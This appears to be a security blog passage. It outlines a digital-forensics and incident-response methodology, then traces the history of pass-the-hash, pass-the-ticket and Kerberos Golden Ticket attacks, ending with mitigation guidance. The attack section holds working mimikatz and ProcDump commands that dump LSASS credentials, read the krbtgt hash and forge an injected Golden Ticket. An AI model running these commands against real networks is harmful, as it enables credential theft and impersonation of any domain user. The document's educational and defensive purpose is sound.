System Description: Next comes the step where you start gathering data about the specific incident. Start by taking notes and describing the system you are going to analyze: where the system is being acquired, what the system's role is in the organization and its place in the network. Outline the operating system and its general configuration, such as disk format, amount of RAM and the location of the evidence.

Evidence Acquisition: Identify possible sources of data, acquire volatile and non-volatile data, verify the integrity of the data and ensure the chain of custody. When in doubt about what to collect, be on the safe side: it is better to collect too much than too little. During this step it is also important that you prioritize your evidence collection and engage the business owners to determine the execution and business impact of the chosen strategies. Because volatile data changes over time, the order in which data is collected is important. One suggested order for acquiring volatile data is network connections, ARP cache, login sessions, running processes, open files and the contents of RAM and other pertinent data. Please note that all this data should be collected using trusted binaries and not the ones from the impacted system. After collecting this volatile data you move on to collecting non-volatile data such as the hard drive. Depending on the case there are normally three strategies to create a bit-stream image of the hard drive: using a hardware device like a write blocker, in case you can take the system offline and remove the hard drive; using an incident response and forensic toolkit such as Helix to boot the system; or using live system acquisition (locally or remotely), which might be used when dealing with encrypted systems or systems that cannot be taken offline or are only accessible remotely. After acquiring the data, ensure and verify its integrity. You should also be able to clearly describe how the evidence was found, how it was handled and everything that happened to it, i.e., the chain of custody.
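
As a hedged illustration of the volatile data portion of this step on a Windows host, run from trusted binaries on response media (the exact toolset will vary), the order of volatility can be walked roughly like this, finishing with a RAM capture using a dedicated memory imaging tool:

rem current date and time of the collection
date /t & time /t
rem network connections and listening ports
netstat -nao
rem ARP cache
arp -a
rem logged-on users / login sessions
query user
rem running processes
tasklist /v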

Note that as part of your investigation and analysis the following steps work in a loop where you can jump from one into another in order to find footprints and tracks left by Evil. If you get stuck, don’t give up!

Timeline Analysis: After the evidence acquisition you start your investigation and analysis in your forensics lab. Start by doing a timeline analysis. This is a crucial step and very useful because it includes information such as when files were modified, accessed, changed and created, in a human-readable format known as MAC time evidence. The data is gathered using a variety of tools, extracted from the metadata layer of the file system (inodes on Linux or MFT records on Windows) and then parsed and sorted in order to be analyzed. Timelines of memory artifacts can also be very useful in reconstructing what happened. The end goal is to generate a snapshot of the activity done in the system including its date, the artifact involved, the action and the source. The creation is an easy process but the interpretation is hard. During the interpretation it helps to be meticulous and patient, and it helps if you have comprehensive knowledge of file systems and operating system artifacts. To accomplish this step several commercial or open source tools exist, such as the SIFT Workstation that is freely available and frequently updated.

Media and Artifact Analysis: In this step you may be overwhelmed by the amount of information you could be looking at. You should be able to answer questions such as what programs were executed, which files were downloaded, which files were clicked on, which directories were opened, which files were deleted, where the user browsed to, and many others. One technique used to reduce the data set is to identify files known to be good and the ones known to be bad. This is done using databases like the National Software Reference Library from NIST and hash comparisons using tools like hfind from The Sleuth Kit. In case you are analyzing a Windows system you can create a super timeline. The super timeline will incorporate multiple time sources into a single file. You must have knowledge of file systems, Windows artifacts and registry artifacts to take advantage of this technique, which will reduce the amount of data to be analyzed. Other things you will be looking at are evidence of account usage, browser usage, file downloads, file opening/creation, program execution and USB key usage. Memory analysis is another key step, used to examine rogue processes, network connections, loaded DLLs, evidence of code injection, process paths, user handles, mutexes and many others. Beware of anti-forensic techniques, such as steganography or data alteration and destruction, that will impact your investigation, analysis and conclusions.
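
As a minimal sketch of the known-good hash filtering mentioned above, using hfind from The Sleuth Kit against an NSRL hash set (file names and the hash value are placeholders):

# build an index over the NSRL MD5 hashes, then look up a hash of interest
hfind -i nsrl-md5 NSRLFile.txt
hfind NSRLFile.txt <md5-hash-of-file>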

String or Byte Search: This step consists of using tools that search the low-level raw image. If you know what you are looking for, you can use this method to find it. It is in this step that you use tools and techniques that look for byte signatures of known files, the so-called magic cookies. It is also in this step that you do string searches using regular expressions. The strings or byte signatures you look for are the ones relevant to the case you are dealing with.
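
Two hedged examples of what such searches can look like (image name and search pattern are hypothetical): the first prints printable strings with their decimal byte offsets so hits can be mapped back to the file system, and the second uses The Sleuth Kit's sigfind to look for the MZ header signature at offset 0 of each block:

strings -a -t d suspect.img | grep -iE 'confidential|\.exe'
sigfind -o 0 4D5A suspect.img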

Data Recovery: This is the step where you try to recover data from the file system. Some of the tools that help here are the ones available in The Sleuth Kit, which can be used to analyze the file system, data layer and metadata layer. Analyzing the slack space and unallocated space, and doing in-depth file system analysis, is part of this step in order to find files of interest. Carving files from the raw image based on file headers, using tools like foremost, is another technique to gather further evidence.
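
For illustration, a hedged foremost invocation that carves a few common file types out of a raw image into an output directory (names hypothetical):

# carve JPEG, PDF and PE files from the raw image based on their headers
foremost -t jpg,pdf,exe -i suspect.img -o carved/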

Reporting Results: The final phase involves reporting the results of the analysis, which may include describing the actions performed, determining what other actions need to be performed, and recommending improvements to policies, guidelines, procedures, tools, and other aspects of the forensic process. Reporting the results is a key part of any investigation. Consider writing in a way that reflects the usage of scientific methods and facts that you can prove. Adapt the reporting style depending on the audience and be prepared for the report to be used as evidence for legal or administrative purposes.


References and further reading:

SANS 508 – Advanced Computer Forensics and Incident Response
Guide to Integrating Forensic Techniques into Incident Response (pub. #: 800-86), 2006, US NIST
Computer Security Incident Handling Guide (pub. #: 800-61), 2004, US NIST
The Complex World of Corporate CyberForensics Investigations by Gregory Leibolt



The path to the Golden Ticket

Lateral movement is one of the tactics used during an attack and is normally successful due to some kind of credential theft that has happened at some point during the course of the attack. One technique used to materialize this tactic is pass-the-hash, which has been around for a long time. It was initially demonstrated by Paul Ashton in 1997 against Unix Samba, but became more mainstream in 2000 when Hernan Ochoa released a paper, “Modifying Windows NT Logon Credential”. The technique evolved and became very popular in 2007 when he released the Pass the Hash toolkit. This tool brought the pass-the-hash technique mainstream because it could be easily executed on Windows systems. In the same year, Marcus Murray from TrueSec presented another tool during TechEd that could leverage this same attack technique. Soon after that, Ivan Bütler from Compass Security wrote an interesting paper about it. Also in the same year, Benjamin Delpy `gentilkiwi`, a French security researcher – less known at the time – released a tool called mimikatz.

The pass-the-hash attack takes advantage of cached credentials stored on the system, which are used to authenticate to other resources in the network. The details are well explained by Skip Duckwall and Chris Campbell in their BlackHat 2013 paper “Microsoft has a credential problem”, describing the issues that Microsoft has with credentials due to the single sign-on solutions that are in place, which also affect smartcards. For convenience and to improve the customer experience, Microsoft implements, behind the scenes, different methods that allow a user to type a username and password only once. This permits the user to log in to SharePoint, access network shares, read email, etc. without constantly providing credentials, avoiding Mark Russinovich's “credential fatigue” problem. The outcome of this convenience is that credentials are cached, meaning that with this type of technique an attacker with local admin or system privileges is able to retrieve the credentials from process memory (LSASS) in a hash representation. There are other places where the credentials can be retrieved from storage, like the SAM database in a standalone environment or the NTDS.dit file in an Active Directory domain. Those password representations can then be reused to spread across the network and increase the attacker's foothold. The usage of some of the aforementioned tools is illustrated in a SANS reading room paper by Bashar Ewaida.

Time passed, and in 2011 Hernan Ochoa struck again by evolving the Pass the Hash toolkit into a new tool called Windows Credential Editor (WCE), which runs on 32-bit and 64-bit Windows systems and can dump the NTLM/LM hashes of the credentials cached on the system by injecting into the LSASS process or just by reading its memory. The novelty was that this tool introduced a new technique called pass-the-ticket, the equivalent of pass-the-hash but applied to Kerberos tickets instead of NTLM/LM hashes. This technique is interesting because the attacker can escalate privileges without cached credentials on the machine. Instead, Kerberos tickets, which can be used for a period of 10 hours, can be requested and injected into the attacker's session.

Also in 2011, Benjamin Delpy was able to demonstrate that not only password representations but also clear-text passwords could be retrieved from memory, by taking advantage of how the credential provider for digest authentication works in Windows. For example, if a user authenticates to a website using the digest authentication method from a web browser, a computed hash is sent through the network. However, in order to compute this hash the digest credential provider (wdigest.dll) uses 3 elements, and one of them is the password, which means the password needs to be stored in memory in order to be used. Since then Benjamin has been further developing his research, and mimikatz 2.0 is the latest version of the tool, focusing on Windows 2008 R2 and 8.1. The tool has also been incorporated into the Metasploit framework, and it can also work offline by reading an LSASS memory dump that you can retrieve using a process dump. This method was even incorporated as a plug-in of the memory forensics tool Volatility.
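
As a hedged sketch of that offline workflow (file names are hypothetical): dump the LSASS process on the target with Sysinternals ProcDump and then feed the dump to mimikatz on an analysis machine:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords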

But Benjamin went even further with his research and pleased the security community with the implementation of another novel technique that uses Kerberos tickets to impersonate any user in the domain and defeat the 10-hour lifespan. This technique is known as the Golden Ticket (a counterfeit Kerberos ticket) and takes advantage of the way the Microsoft Kerberos implementation works and how it relies on the KRBTGT account: the secret key used to sign all Kerberos TGTs is the KRBTGT hash. This technique permits creating a valid Kerberos ticket that allows impersonation of any user in the Active Directory domain. If you have some time, try the tool – it is great and “can extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets”.
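
A hedged sketch of how a Golden Ticket is typically forged with mimikatz, with every value below being a placeholder rather than a real domain: the KRBTGT hash is first read from a domain controller with sufficient privileges, and the forged ticket is then injected into the current session with /ptt:

mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt

mimikatz # kerberos::golden /user:Administrator /domain:corp.example /sid:S-1-5-21-<domain SID> /krbtgt:<krbtgt NTLM hash> /ptt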

Why can't Microsoft patch this problem? Because it works as designed and relies on the current trust models. If you are logged in, the system has your credentials stored in memory to be used across the different credential providers, to perform actions on behalf of the user and to facilitate single sign-on. However, in order to mitigate the risk of this attack scenario, Microsoft created a taskforce called the Pass the Hash workgroup, mandated to identify tools, policies and best practices that companies could use to reduce their exposure to this attack. Among the outcomes of this taskforce are mitigations that include restricting and protecting highly privileged credentials, restricting local accounts with administrative privileges and restricting inbound traffic with the host firewall. These and other recommendations are explained in more detail in the white paper “Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques”.

Many experts believe that a well-resourced and determined adversary will usually be successful in attacking systems, even if the target has invested in its defensive posture. In case you have been compromised and were able to contain the damage, here are some recommendations on how to restore the Active Directory service to its state before the attack. Of course everyone wants to avoid these scenarios. One defense strategy that we (the defense side) have is to continually increase the costs associated with executing the attack. The National Security Agency/Central Security Service Information Assurance Directorate released a paper, “Reducing the Effectiveness of Pass-the-Hash”, that helps mitigate the exposure to this type of attack. The Computer Emergency Response Team for the EU institutions (CERT-EU) just released a white paper, “Protection from Kerberos Golden Ticket”, that contains good recommendations as well.
